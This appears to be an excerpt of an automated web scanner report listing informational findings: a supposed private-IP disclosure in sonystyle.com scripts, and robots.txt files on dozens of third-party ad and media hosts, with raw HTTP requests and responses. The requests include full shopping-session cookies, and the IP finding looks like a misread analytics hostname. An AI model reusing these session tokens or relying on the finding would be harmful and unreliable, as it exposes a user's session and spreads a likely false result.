Cookie: TS5bbf46=b8fba18f1f5a5e109b65064644b856f578ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1; mbox=check#true#1305494554|session#1305494389047-605069#1305496354|PC#1305494389047-605069.17#1306704094; s_cc=true; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay%25253FserviceId%25253D8198552921665820080%252526orderItemId%25253D123237101%252526installationId%25253D%252526langId%25253D-1%252526fromInterstitialPage%25253Dtrue%252526categoryId%25253D%252526quantity%25253D1%252526engraveTextLine2%25253D%252526orderId%25253D.%252526engraveTextLine1%25253D%252526mainItemOrdrIt%2526oid%253Dhttp%25253A//www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526lan%2526ot%253DA; fsr.s={"v":1,"rid":"1305494398924_849794","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":4,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay","lc":{"d0":{"v":4,"s":true,"e":2}},"cd":0,"sd":0}; s_vi=[CS]v1|26E821BE851631F8-400001A4801F70D4[CE]; JSESSIONID=0000swi2mynvgN0b4v4Ck42F0Ou:14aelsmcl; WC_PERSISTENT=tibXcp5Dlk4Jh%2fA0Lwms1Uargj4%3d%0a%3b2011%2d05%2d15+17%3a21%3a17%2e83%5f1305494403722%2d66941%5f10151%5f239700478%2c%2d1%2cUSD%5f10151; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d1%2c10151; BIGipServerlivenew.sonystyle.com-80=1988239776.20480.0000; 71737897-VID=16601155425835; 71737897-SKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; WC_USERACTIVITY_239700478=239700478%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cW0B82C6kt%2fu1ZnIDD%2bD9cyUsUuZ5p6eV3VX9sG%2bxOfyS%2fVahUux21ujZk%2fh12gxePDRShlaYz5Kb%0arseHaKhahut2Hi0TlmPEHwulUbbCf3yqB5j8879HQFm5kyylh3cBPYT%2fYDZLv6Pzx7s%2b8JmOJA%3d%3d

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 13 May 2011 19:22:00 GMT
Accept-Ranges: bytes
ntCoent-Length: 28936
Content-Type: application/x-javascript
Content-Length: 28936
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:22:00 GMT
Connection: keep-alive
Cache-Control: private

// TEMPORARY FREEZE OVERRIDE
function unFreezePage() {}
function freezePage() {
   popOpen('busyIndicator');
   document.getElementById('busyIndicator').style.cursor = "wait";

   var delayedFuncti
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

26.40. https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.112.2

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=409204880
Cookie: TS5bbf46=b8fba18f1f5a5e109b65064644b856f578ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1; mbox=check#true#1305494554|session#1305494389047-605069#1305496354|PC#1305494389047-605069.17#1306704094; s_cc=true; s_visit=1; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"rid":"1305494398924_849794","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":4,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay","lc":{"d0":{"v":4,"s":true,"e":2}},"cd":0,"sd":0}; s_vi=[CS]v1|26E821BE851631F8-400001A4801F70D4[CE]; JSESSIONID=0000swi2mynvgN0b4v4Ck42F0Ou:14aelsmcl; WC_PERSISTENT=tibXcp5Dlk4Jh%2fA0Lwms1Uargj4%3d%0a%3b2011%2d05%2d15+17%3a21%3a17%2e83%5f1305494403722%2d66941%5f10151%5f239700478%2c%2d1%2cUSD%5f10151; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d1%2c10151; BIGipServerlivenew.sonystyle.com-80=1988239776.20480.0000; 71737897-VID=16601155425835; 71737897-SKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; WC_USERACTIVITY_239700478=239700478%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cW0B82C6kt%2fu1ZnIDD%2bD9cyUsUuZ5p6eV3VX9sG%2bxOfyS%2fVahUux21ujZk%2fh12gxePDRShlaYz5Kb%0arseHaKhahut2Hi0TlmPEHwulUbbCf3yqB5j8879HQFm5kyylh3cBPYT%2fYDZLv6Pzx7s%2b8JmOJA%3d%3d

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 03 May 2011 21:22:34 GMT
Accept-Ranges: bytes
ntCoent-Length: 20033
Content-Type: application/x-javascript
Content-Length: 20033
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:22:17 GMT
Connection: keep-alive
Cache-Control: private

/*    SONY | SONY STYLE
*    Homepage JS Functions and Event Listeners
*
*    Author: Steve Rucker, Interactive Developer | B2C CST SAPE Augmentation team | srucker@sapient .com
* Alex Jain, Sr As
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

27. Robots.txt file previous next
There are 86 instances of this issue:

http://0.gravatar.com/avatar/4c44589c9d078af70f5c8c1c46945e93
http://a.monetate.net/trk/3/s/a-06b34e08/p/travelocity.com/566828221
http://a.tribalfusion.com/j.ad
http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel.disney
http://ad.doubleclick.net/ad/N6434.1165.SONY.COM/B4856611.338
http://ad.turn.com/server/pixel.htm
http://ahome.disney.go.com/globalelements/chrome.css
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://api.ak.facebook.com/restserver.php
http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003017/cw.jsx
http://b.scorecardresearch.com/b
http://c7.zedo.com/utils/ecSet.js
http://cdn.turn.com/server/ddc.htm
http://cdn5.tribalfusion.com/media/1956006/frame.html
http://cm.g.doubleclick.net/pixel
http://content.usatoday.com/asp/usataj/usatajhost.htm
http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx
http://d.xp1.ru4.com/um
http://dar.youknowbest.com/
http://data.adsrvr.org/map/cookie/contextweb
http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote
http://dcl2.wdpromedia.com/concat/4.39.1.5/css
http://disneycruise.disney.go.com/reservations/customize
http://feeds.bbci.co.uk/news/rss.xml
http://feeds.delicious.com/v2/json/urlinfo/data
http://fingerhut-www.baynote.net/baynote/tags3/common
http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard
http://fls.doubleclick.net/activityi
http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH
http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1034849195/
http://gs.instantservice.com/geoipAPI.js
http://https.edge.ru4.com/smartserve/ad
http://i.usatoday.net/asp/usatly/handler.ashx
http://images.scanalert.com/meter/www.mcafee.com/55.gif
http://imawow.weather.com/web/common/wxicons/36/26.gif
http://l.addthiscdn.com/live/t00/250lo.gif
http://login.dotomi.com/ucm/UCMController
http://metrics.fingerhut.com/b/ss/fingerhutcomprod/1/H.21/s03779584402218
http://metrics.mcafee.com/b/ss/mcafeecomglobal/1/H.21/s06847484195604
http://metrics.sonystyle.com/b/ss/sonysonystyle2007prod/1/H.19.4/s95522347362719
http://metrics.us.playstation.com/b/ss/sceablogsprod/1/H.20.3/s87736232713796
http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml
http://nexus2.ensighten.com/sony/serverComponent.php
http://odb.outbrain.com/utils/ping.html
http://pagead2.googlesyndication.com/pagead/imgad
http://pastebin.com/trends
http://pixel.invitemedia.com/pubmatic_sync
http://pubads.g.doubleclick.net/gampad/ads
http://r.turn.com/r/beacon
http://rs.instantservice.com/resources/smartbutton/7470/II3_Servers.js
http://s7.addthis.com/js/250/addthis_widget.js
http://secureshopping.mcafee.com/
http://serv.adspeed.com/ad.php
http://sony.links.channelintelligence.com/pages/prices.asp
http://sony.links.origin.channelintelligence.com/pages/wl.asp
http://sony.tt.omtrdc.net/m2/sony/mbox/ajax
http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.bhphotovideo.com/FrameWork/css/min/reset-fonts-layout.css
http://sync.mathtag.com/sync/img
http://t.invitemedia.com/track_imp
http://tag.admeld.com/ad/js/201/unitedstates/728x90/ros
http://tag.contextweb.com/TagPublish/getjs.aspx
http://travel.travelocity.com/favicon.ico
http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
http://ts.istrack.com/trackingAPI.js
http://turn.nexac.com/r/pu
http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s02545102506410
http://w88.go.com/b/ss/wdgwdprodcl,wdgwdprosec,wdgdsec/1/H.22.1/s07427038340829
http://webassets.scea.com/pscomauth/groups/public/documents/webasset/psn_favicon.ico
http://wow.weather.com/weather/wow/module/USNY0400
http://www.bhphotovideo.com/bnh/controller/home
http://www.cruisecritic.com/reviews/cruiseline.cfm
http://www.facebook.com/plugins/like.php
http://www.google-analytics.com/__utm.gif
http://www.googleadservices.com/pagead/conversion/1034849195/
http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp
https://www.mcafeesecure.com/RatingVerify
http://www.mickeypath.com/id/1304751739.jpg
http://www.orbitz.com/favicon.ico
http://www.passporter.com/concierge/ticker/countdown17548-1026.png
http://www.passporterboards.com/forums/clientscript/vbulletin_important.css
http://www.popularmedia.net/widget/2be74c3e1d1bba1022bc80b0b5e0e0a5
http://www.siteadvisor.com/download/windows.html
http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
http://www.viddler.com/file/7d63c65a/html5mobile/

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

27.1. http://0.gravatar.com/avatar/4c44589c9d078af70f5c8c1c46945e93 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://0.gravatar.com
Path:	/avatar/4c44589c9d078af70f5c8c1c46945e93

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 0.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: text/plain
Date: Mon, 16 May 2011 01:24:43 GMT
Expires: Mon, 16 May 2011 01:29:43 GMT
Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT
Server: ECS (dca/5339)
X-Cache: HIT
Content-Length: 99
Connection: close

User-Agent: *
Disallow: /*.json
Disallow: /*.xml
Disallow: /*.php
Disallow: /*.vcf
Disallow: /*.qr

27.2. http://a.monetate.net/trk/3/s/a-06b34e08/p/travelocity.com/566828221 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.monetate.net
Path:	/trk/3/s/a-06b34e08/p/travelocity.com/566828221

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.monetate.net

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 May 2011 01:29:53 GMT
Content-Type: text/plain
Content-Length: 26
Last-Modified: Thu, 12 Aug 2010 15:52:45 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

27.3. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

27.4. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel.disney previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adj/tmg.telegraph.sponsored/sponsored.travel.disney

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 16:31:04 GMT
Date: Mon, 16 May 2011 01:19:40 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

27.5. http://ad.doubleclick.net/ad/N6434.1165.SONY.COM/B4856611.338 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N6434.1165.SONY.COM/B4856611.338

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Sun, 15 May 2011 21:21:44 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

27.6. http://ad.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Mon, 16 May 2011 01:19:49 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

27.7. http://ahome.disney.go.com/globalelements/chrome.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ahome.disney.go.com
Path:	/globalelements/chrome.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ahome.disney.go.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=60
Date: Mon, 16 May 2011 01:29:23 GMT
Content-Type: text/plain; charset=UTF-8
Last-Modified: Mon, 16 May 2011 01:23:29 GMT
Accept-Ranges: bytes
ETag: "80be91dc6713cc1:10eb"
Server: Microsoft-IIS/6.0
From: DOLDISWEB10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=604B3504-4F29-4A9D-8131-7141983D9CDD; path=/; expires=Mon, 16-May-2031 01:29:23 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 01:33:29 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 724
Connection: close

# /robots.txt file for http://home.disney.go.com/

User-Agent: DCOM FAST Enterprise Crawler
Disallow: /search/

User-agent: *
Disallow: /_global/
Disallow: /_lib/
Disallow: /_modules/
Disallow: /admin
...[SNIP]...

27.8. http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ajax.googleapis.com
Path:	/ajax/libs/jquery/1.3.2/jquery.min.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Last-Modified: Mon, 23 Aug 2010 20:43:16 GMT
Date: Sun, 15 May 2011 20:26:37 GMT
Expires: Sun, 15 May 2011 20:26:37 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.9. http://api.ak.facebook.com/restserver.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.ak.facebook.com
Path:	/restserver.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.ak.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
X-FB-Server: 10.36.35.126
X-Cnection: close
Content-Length: 24
Cache-Control: max-age=86400
Expires: Tue, 17 May 2011 01:25:14 GMT
Date: Mon, 16 May 2011 01:25:14 GMT
Connection: close

User-agent: *
Disallow:

27.10. http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003017/cw.jsx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atd.agencytradingdesk.net
Path:	/WatsonTracker/IMP/A1000138/C1000187/P1003017/cw.jsx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: atd.agencytradingdesk.net

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Last-Modified: Wed, 07 Feb 2007 15:35:46 GMT
Accept-Ranges: bytes
ETag: "18b4e0a2cd4ac71:8e6"
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:26:08 GMT
Connection: keep-alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

User-agent: *
Allow: /Corporate/
Disallow: /TagPublish/
Disallow: /xt2/
Disallow: /rt1/
Disallow: /CWClick/
Disallow: /ContextAd/

27.11. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Mon, 16 May 2011 21:31:00 GMT
Date: Sun, 15 May 2011 21:31:00 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

27.12. http://c7.zedo.com/utils/ecSet.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/utils/ecSet.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Tue, 31 May 2005 07:08:00 GMT
ETag: "32e64b-4c-3f861aa21f400"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
X-Varnish: 1036340324
Date: Mon, 16 May 2011 01:30:23 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

27.13. http://cdn.turn.com/server/ddc.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.turn.com
Path:	/server/ddc.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Mon, 16 May 2011 01:19:51 GMT
Content-Length: 47
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

27.14. http://cdn5.tribalfusion.com/media/1956006/frame.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn5.tribalfusion.com
Path:	/media/1956006/frame.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn5.tribalfusion.com

Response

HTTP/1.0 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
Content-Length: 26
X-Reuse-Index: 758
Content-Type: text/plain
Date: Sun, 15 May 2011 21:31:35 GMT
Connection: close

User-agent: *
Disallow: /

27.15. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 16 May 2011 01:19:56 GMT
Server: Cookie Matcher
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

27.16. http://content.usatoday.com/asp/usataj/usatajhost.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.usatoday.com
Path:	/asp/usataj/usatajhost.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:30 GMT
Accept-Ranges: bytes
ETag: "0eda5b4165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 16 May 2011 01:19:47 GMT
Connection: close
Content-Length: 1660

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

27.17. http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://contextweb.usatoday.net
Path:	/asp/Context/ContextWebHandler.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: contextweb.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:42 GMT
Accept-Ranges: bytes
ETag: "0fbccbb165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 1660
Date: Mon, 16 May 2011 01:19:45 GMT
Connection: close

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

27.18. http://d.xp1.ru4.com/um previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/um

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d.xp1.ru4.com

Response

27.19. http://dar.youknowbest.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dar.youknowbest.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dar.youknowbest.com

Response

HTTP/1.0 200 OK
Content-Length: 29
Content-Type: text/plain
Content-Location: http://dar.youknowbest.com/robots.txt
Last-Modified: Wed, 08 Dec 2010 17:37:14 GMT
Accept-Ranges: bytes
ETag: "01e78cfe96cb1:de9"
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server: EN-ADSWEB04
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:41:16 GMT
Connection: close

...User-agent: *
Disallow: /

27.20. http://data.adsrvr.org/map/cookie/contextweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.adsrvr.org
Path:	/map/cookie/contextweb

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: data.adsrvr.org

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/plain
Date: Mon, 16 May 2011 01:26:11 GMT
Accept-Ranges: bytes
ETag: "a06beef17b6cc1:0"
Connection: close
Last-Modified: Fri, 29 Apr 2011 14:44:29 GMT
X-Powered-By: ASP.NET
Content-Length: 28

User-agent: *
Disallow: *

27.21. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote previous next

Summary

Severity:	Information
Confidence:	Certain
